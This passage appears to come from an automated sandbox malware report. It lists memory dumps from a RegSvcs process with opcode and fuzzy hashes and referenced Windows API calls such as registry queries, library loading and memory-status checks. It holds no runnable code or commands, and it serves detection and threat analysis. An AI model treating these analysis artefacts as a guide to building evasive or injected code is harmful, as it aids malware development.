                                                                                                                          • Opcode Fuzzy Hash: 59cb3f5e1a9b0aac6a359d68f436cc2406db35c8b7335f261d46dace7cd8b501
                                                                                                                          • Instruction Fuzzy Hash: E2D1F431F102158FDF54DBB9C8943AEB7E2EB85324F1AC56AD019EB281CA35E845C7B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph carried no resolved API calls)
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: \$\$\$\
                                                                                                                          • API String ID: 0-3238275731
                                                                                                                          • Opcode ID: 18cda1e07c91d7fe281f96fadf8fb81a054ca1473cae8b0329303e9b197fd6db
                                                                                                                          • Instruction ID: 42914c71deea9bc6b58d25180ace25731b8fb2eb104ab9f65ed5ab59da7da416
                                                                                                                          • Opcode Fuzzy Hash: 18cda1e07c91d7fe281f96fadf8fb81a054ca1473cae8b0329303e9b197fd6db
                                                                                                                          • Instruction Fuzzy Hash: 8702C271B102058FCF94EBB8D8596AE77F6BF88314B188529D416DB384EB34DD068BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references LdrInitializeThunk)
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: j
                                                                                                                          • API String ID: 0-2137352139
                                                                                                                          • Opcode ID: 2a9ceb8c17fe14a43601e0a3928feb750949073a2827131ac774fbec36d3fa18
                                                                                                                          • Instruction ID: 4ced54580a596aa876ca1ae36f795f48396c6d32e75be75f911a367c07642ad4
                                                                                                                          • Opcode Fuzzy Hash: 2a9ceb8c17fe14a43601e0a3928feb750949073a2827131ac774fbec36d3fa18
                                                                                                                          • Instruction Fuzzy Hash: ADE1C230B102058FCB55EBB5D899AAEB7B2AF85304F1085A9E405DF395EF74DD06CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references LdrInitializeThunk, see APIs below)
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 12397a80bf99951b9664e76574c1c98258c4ef1d446896e7789f6a26bf0dc3a2
                                                                                                                          • Instruction ID: 8e5e5302c400bfeef8ae0bc952354a8eadb832aecc7bf0542c99b3c5a5dcdbc8
                                                                                                                          • Opcode Fuzzy Hash: 12397a80bf99951b9664e76574c1c98258c4ef1d446896e7789f6a26bf0dc3a2
                                                                                                                          • Instruction Fuzzy Hash: E8715D30E10206CFDB54EFB5D5987AEB7B6FF84305F108828E0169B294EF799946CB84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references GlobalMemoryStatusEx)
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2a021ce27c657fc2be48f70acc0474270c9ebc1b823fdb3dbeee5802825a0a68
                                                                                                                          • Instruction ID: f21c8e8c48e948d1d2cdf99938f1426937fbaa6774171c247315be4681f4072e
                                                                                                                          • Opcode Fuzzy Hash: 2a021ce27c657fc2be48f70acc0474270c9ebc1b823fdb3dbeee5802825a0a68
                                                                                                                          • Instruction Fuzzy Hash: 6B413472D147869FCB01DFA9D8443DEBBB0AF89210F09856AD408EB741DB789845CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references RegQueryValueExW, see APIs below)
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06C6F001
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: b4fd687245d79ee68482af6c2acc77ef4115c1b4c7188f84821d1d8a10a5df89
                                                                                                                          • Instruction ID: 8f43170946221ec01d7f21bcac093841c645aa47e80546c86d3a67a4e1678d3f
                                                                                                                          • Opcode Fuzzy Hash: b4fd687245d79ee68482af6c2acc77ef4115c1b4c7188f84821d1d8a10a5df89
                                                                                                                          • Instruction Fuzzy Hash: B14165B5D002489FCB50CFAAD880ADEBBF5AF48300F14806EE819AB350D7749906CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references RegOpenKeyExW, see APIs below)
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06C6ED44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: b7c93b47f377f76b6f20e05a5bd306344fac5d715c8b38aca94168386254c0cb
                                                                                                                          • Instruction ID: 68475fffddf484662b7f4c9447f89609fd8f75dc62863aaf8068cf29af3807ca
                                                                                                                          • Opcode Fuzzy Hash: b7c93b47f377f76b6f20e05a5bd306344fac5d715c8b38aca94168386254c0cb
                                                                                                                          • Instruction Fuzzy Hash: C14176B9D043498FDB04CFA9C584B9EBFF1BF49304F28816AE409AB351C7759949CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (basic-block layout data not reproduced; the graph references LoadLibraryA, see APIs below)
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0169C8FA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: e2524e07949ed88fb94bcd2e80082e324731a70ba838aa1daff4c1c9552a26c8
                                                                                                                          • Instruction ID: 71a81810a047c889b8afc48d4eb2dcc7807f9f03c652f1c9fac251988f6594a4
                                                                                                                          • Opcode Fuzzy Hash: e2524e07949ed88fb94bcd2e80082e324731a70ba838aa1daff4c1c9552a26c8
                                                                                                                          • Instruction Fuzzy Hash: C93134B1D102499FDF14CFA9C9857AEBFB5BB08324F148129E815EB380D7789845CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph omitted; only block ranges recoverable): entry block 6c6dbb0-6c6efb1; API call block 6c6efcf-6c6f011 (RegQueryValueExW)
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06C6F001
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: f72aa01700675bda948355b843364b37e0fbb7e1d1c38e2af0e18d3b644e3d3c
                                                                                                                          • Instruction ID: 3e136fe9eced3f574db3149a533f22efb0545ee8139681126a9ab9423edab9fc
                                                                                                                          • Opcode Fuzzy Hash: f72aa01700675bda948355b843364b37e0fbb7e1d1c38e2af0e18d3b644e3d3c
                                                                                                                          • Instruction Fuzzy Hash: E131EEB1D00258DFCB20CF9AD884A9EBBF5BF48314F24802EE819AB310D7759945CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph omitted; only block ranges recoverable): entry block 169c824-169c887; API call block 169c8c0-169c90a (LoadLibraryA)
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0169C8FA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: a61f61a80e735ee539c2d5130ed886bcf969b3fc2cf54f113a132a6a7fac92f3
                                                                                                                          • Instruction ID: 7085590a87a6ff39222b07571e9db808058a0d6eea4a86fb031309c2be695f37
                                                                                                                          • Opcode Fuzzy Hash: a61f61a80e735ee539c2d5130ed886bcf969b3fc2cf54f113a132a6a7fac92f3
                                                                                                                          • Instruction Fuzzy Hash: 013112B1D102498FDF14CFA8C9857AEBFB5BB48324F148129E816AB380D7799845CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06C6ED44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 01ab9c6e84ef4f7f69301ecbafa24e1fbbb0cec7aa20ab9e3082581dbbb45f5a
                                                                                                                          • Instruction ID: 68369c3670c518da424d78a3c2b001f7fb0ae481664f9427a64d9eceea14a45d
                                                                                                                          • Opcode Fuzzy Hash: 01ab9c6e84ef4f7f69301ecbafa24e1fbbb0cec7aa20ab9e3082581dbbb45f5a
                                                                                                                          • Instruction Fuzzy Hash: 9931F0B5D042499FDB10CF9AC584A8EFFF5BF48304F28816EE809AB341C7759985CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph omitted; only block ranges recoverable): entry block 6c69148-6c69167; API call block 6c691df-6c691f4 (LdrInitializeThunk)
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5661fc3b4b429b27fb5d59a6ea4736933ba56d8ea96afa5c8548587cad609f53
                                                                                                                          • Instruction ID: 38144e573d27bb91bee1acbbe59e086134f943e46f239f56b5d3d46aecc8f722
                                                                                                                          • Opcode Fuzzy Hash: 5661fc3b4b429b27fb5d59a6ea4736933ba56d8ea96afa5c8548587cad609f53
                                                                                                                          • Instruction Fuzzy Hash: B231BE70E05246CFDB55DFB5C8987ADBBB2EF46300F1484A9D005AB2A1DB78C846CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1CC06,?,?,?,?,?), ref: 06D1CCC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 7b00d2a75e06a75acdb57c4536175808091edc0ce2b9563d0fbb5ab1c040c6f8
                                                                                                                          • Instruction ID: 2d44d937b42feae2d7c92878ada71906d833fb5687abe5eda740bbb3e747206a
                                                                                                                          • Opcode Fuzzy Hash: 7b00d2a75e06a75acdb57c4536175808091edc0ce2b9563d0fbb5ab1c040c6f8
                                                                                                                          • Instruction Fuzzy Hash: 8821E5B5D00248EFDB10CF9AD984BEEBBF5EB48320F14841AE914A7710D378A944CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1CC06,?,?,?,?,?), ref: 06D1CCC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 6c1720020303f8ce1fd5934e444ada90419c929136776d4eba59f7c4378de248
                                                                                                                          • Instruction ID: e0a1685a71098ef00df086a4526ff335ae2a977a8d4825c628a98901972b08e3
                                                                                                                          • Opcode Fuzzy Hash: 6c1720020303f8ce1fd5934e444ada90419c929136776d4eba59f7c4378de248
                                                                                                                          • Instruction Fuzzy Hash: 5F21E9B5D00249AFDB10CFA9D984BDEBBF4EB48314F14841AE914A7750D378A944CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 01694C9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 5d4610c35e478c7ccc93cc299b0fc6a57f2ccdb12449220e0a7be6178196b168
                                                                                                                          • Instruction ID: f6e4aadab5fb4f24ce9a40bb6bd9eab6c16b22aa198373f64d4d440e4f1b25f2
                                                                                                                          • Opcode Fuzzy Hash: 5d4610c35e478c7ccc93cc299b0fc6a57f2ccdb12449220e0a7be6178196b168
                                                                                                                          • Instruction Fuzzy Hash: 4C217770900385CFDF20DFA9C988BAABBF4FB49319F24842AC449E7645D739A545CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: xk
                                                                                                                          • API String ID: 0-664891089
                                                                                                                          • Opcode ID: b476017bbc0e2db2bf668f9a99d235dc007a508b59b6eb3b75b8e06eb5072f47
                                                                                                                          • Instruction ID: 41f1688e97ab8981fb3713b0d426d69585c5aabe8fb432c77855b3c0c0ae9d52
                                                                                                                          • Opcode Fuzzy Hash: b476017bbc0e2db2bf668f9a99d235dc007a508b59b6eb3b75b8e06eb5072f47
                                                                                                                          • Instruction Fuzzy Hash: 16B1AB30E00A498FDFA5CF65C5406ADBBF3AF86354F248169E406AF391EB74E841CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D18252), ref: 06D1833F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1890195054-0
                                                                                                                          • Opcode ID: b3da8b470bebca4788144c1871cf056f2a67c0913e0cbfb352d900b34f1002c3
                                                                                                                          • Instruction ID: 9dfd73543b0d453b0c790c0eaf7790209c0bab484097bb8c1261805ec395e20a
                                                                                                                          • Opcode Fuzzy Hash: b3da8b470bebca4788144c1871cf056f2a67c0913e0cbfb352d900b34f1002c3
                                                                                                                          • Instruction Fuzzy Hash: 321103B1D006599BCB10DF9AD8447DEFBB4AB48324F14812AE818B7740D3B8A945CFE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D18252), ref: 06D1833F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1890195054-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 01694C9A
Memory Dump Source
• Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: \
• API String ID: 0-2967466578
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.527066289.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_15fd000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9de5f5eb6bb7d351abda7b2d1aa7dbbed1a8b9475a1157b41e5db7ad70d5f943
• Instruction ID: d3e01fab121c6ca778139851e4421016c923a14d0f5bdef7e0642f2b5a4fe633
• Opcode Fuzzy Hash: 9de5f5eb6bb7d351abda7b2d1aa7dbbed1a8b9475a1157b41e5db7ad70d5f943
• Instruction Fuzzy Hash: B141BE31A00299DFEF15CFA4C844A9EBFB2FF49354F058156E845AF2A1E331E954CBA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09f7d6f4a0c45451ef25124a6fef14ec1824e7af5d811c00aed0ef005465efe6
• Instruction ID: 72ce9a5133369191d6cf1fadd9e656f774528c0342df9d4b74d4e1b641b636b3
• Opcode Fuzzy Hash: 09f7d6f4a0c45451ef25124a6fef14ec1824e7af5d811c00aed0ef005465efe6
• Instruction Fuzzy Hash: D821F670B142058FCB85EBB8D85599E37F2BF89200B448466D11AEB355EB348C06CB65
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7e3f81181044fa0c198e7230732fd1e6ecc0c11d44b623001f58752fade3ac8
• Instruction ID: 62fb776dbcb8ba290e242ced82cf9dd3e93d45c4cd2d292fdf2b49425d203dd8
• Opcode Fuzzy Hash: f7e3f81181044fa0c198e7230732fd1e6ecc0c11d44b623001f58752fade3ac8
• Instruction Fuzzy Hash: 00210530B143458FCB81EBB8D8549AD7BF1BF8A200B458466D149EB3A5EB34DD068B65
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5aa91bde15375149c3fe43250f7c8fcde4ccdde84ef43e1244b65fe18ce4a06f
• Instruction ID: faded3107051997634c8a8caa9d189f78d062b56f303924207f681caf78bac91
• Opcode Fuzzy Hash: 5aa91bde15375149c3fe43250f7c8fcde4ccdde84ef43e1244b65fe18ce4a06f
• Instruction Fuzzy Hash: 5221D671504240DFDB06DFD4D9C0B2ABBB5FB88328F248569ED054F686C337D856CAA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f08264360908f5b25a4c2a2c4514aab0c2fc7139bd73df9bb97e28630c7873c0
• Instruction ID: 5f8bfcc065d37ac04837bdf58f140f467adc55306ac7287629623e4b6fa28b4a
• Opcode Fuzzy Hash: f08264360908f5b25a4c2a2c4514aab0c2fc7139bd73df9bb97e28630c7873c0
• Instruction Fuzzy Hash: 0C213671504200EFDB02DFD4C9C0B6ABBB5FB84324F24C568E8090F687C376E806C6A1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.527066289.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_15fd000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 228854d3c91b6a16344dfabdc8f17ea79e81f48d84baf96785477601a75dfe2c
• Instruction ID: a4eb137c17b4fb7eb731e2e7a8b40175fe5fd066784d15ad0ed7c343a8f7241c
• Opcode Fuzzy Hash: 228854d3c91b6a16344dfabdc8f17ea79e81f48d84baf96785477601a75dfe2c
• Instruction Fuzzy Hash: E9213771504240DFDB01DF14D8C9B1ABBA5FB88324F24C96DDA094F7A6C336D846CAA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
